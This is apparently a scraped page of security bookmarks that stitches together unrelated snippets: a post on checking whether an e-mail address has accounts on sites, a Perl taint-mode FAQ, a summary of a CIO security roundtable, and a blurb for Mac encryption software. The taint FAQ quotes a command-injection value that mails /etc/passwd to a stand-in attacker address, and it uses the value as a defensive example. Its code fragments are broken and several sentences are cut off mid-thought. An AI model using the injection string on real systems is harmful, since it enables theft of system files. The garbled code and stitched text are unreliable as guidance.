Security

Gnupg. Corporation - Home Page. Kantara Initiative: Shaping the Future of Global Identity. Mobile Surveillance-A Primer - MobileActive Wiki. KeePassX - The Official KeePassX Homepage. How Private Are Sites' Membership Lists? Something like this is actually possible with quite a few well-known sites -- given a person's e-mail address, it is possible to find out if they have an account with Match.com, PayPal, Netflix, eBay, Amazon, and Google (and, by the way, Slashdot [CT: We'd fix it if I thought it mattered]).

How Private Are Sites' Membership Lists?

For some of those sites, it may even be possible to take a long list of e-mail addresses and use an automated process to find out which of those addresses have accounts with those sites (something I didn't want to risk trying myself, but as a general rule, if you can do it once, you can do it many times, at least if you do it slowly enough). It does not enable the attacker to extract addresses from a site's membership rolls, which is a much more serious type of breach -- in this case, the attacker would have to already know a list of e-mail addresses, and would only be able to find out which of those addresses have accounts with a given service. Try to create a new account with that e-mail address. Using mod_ssl on Mac OS X. News: Net Pioneer Wants New Internet. SecuriTeam.com. CGI/Perl Taint Mode FAQ. For example, if $form_data{"email"} is "tainted", then the following would still be legal: print $form_data{"email"} .

CGI/Perl Taint Mode FAQ

"\n"; because the print command is not an unsafe operation. But if you try to pass the same variable to an unsafe version of a system call system("mail " . Perl will complain and not allow this. "me@mydomain.com; mail hacker@hack.net < /etc/passwd" Clearly, there are security ramifications. Thus, if you want to do that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. To untaint a variable, you use regular expressions.

The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. Perl considers these new variables that arise from () groups to be untainted. The following will illustrate this: EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. /\w{1}[\w-.] $email = $form_data{"email"}; OK. No. Secunia - Vulnerability and Virus Information. Security Summit. Network World - Can security be a competitive advantage?

Security Summit

Are security and privacy at odds with speed and collaboration? How has Sarbanes-Oxley complicated the security challenge? And how do you balance risk and security? Those are just some of the pressing questions 23 prominent IT executives and academics addressed at a recent daylong executive roundtable at Dartmouth College in Hanover, N.H.

The Thought Leadership Summit on Digital Strategies is an ongoing series of discussions for Fortune 500 CIOs and vice presidents focused on the business issues they face and the enabling role of IT. Participants represented some of the largest and most well-known companies in the U.S., including Fidelity, Staples, Citigroup, Owens-Corning, IBM, General Motors, Hasbro and Cisco . The executives shared with peers their security fears, goals, frustrations and challenges. There was widespread agreement on that point, but several participants noted that sometimes they can't avoid it. M. Macintosh Security Site -> SubRosa Utilities easy-to-use encryption and shredding software for Mac OS and X.

SubRosa Utilities (encryption/decryption file deletion) Information: SubRosa Vol 1-File Utilities is SubRosaSoft.com Ltd's first line of privacy products which help Macintosh users secure themselves and their personal data.

Macintosh Security Site -> SubRosa Utilities easy-to-use encryption and shredding software for Mac OS and X

The suite of software to protect your files consists of the following: file and folder encryption, multi-pass shredder, and free decryptor. Each one of these programs makes it easy enough for any Mac user to enforce digital security on the personal data that is stored on the computer. SubRosa Encryptor The SubRosa Encryptor allows you to take files or folders and convert them into an encrypted archive that you can store safely using 128 bit key encryption.

The archives are made in a format which allows users to transfer them over the Internet without being corrupted upon arrival. Your friend or family can easily decrypt the files by downloading the SubRosa decryptor for free from the FWB web page. The default overwrite policy is set at 3, which is considered most secure.